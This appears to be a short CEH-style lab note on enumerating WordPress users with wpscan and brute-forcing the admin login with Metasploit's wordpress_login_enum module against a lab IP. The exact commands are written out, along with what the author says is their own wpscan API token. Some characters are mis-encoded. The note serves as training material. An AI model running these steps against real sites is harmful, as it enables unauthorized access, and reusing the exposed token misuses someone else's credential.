๐WPScan
https://www.kali.org/tools/wpscan/
Enumerate and hack a web app using wpscan and metasploit
wpscan โ api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads โ url http://10.10.10.16:8080/CEH โ plugins-detection aggressive โ enumerate u
โ enumerate u: Specify the enumeration of users
API Token: Register at https://wpscan.com/register
Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads
service postgresql start
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE password.txt
set RHOST 10.10.10.16
set RPORT 8080
set TARGETURI http://10.10.10.16:8080/CEH
set USERNAME admin
run
Find the credential
Additional Resources
Last updated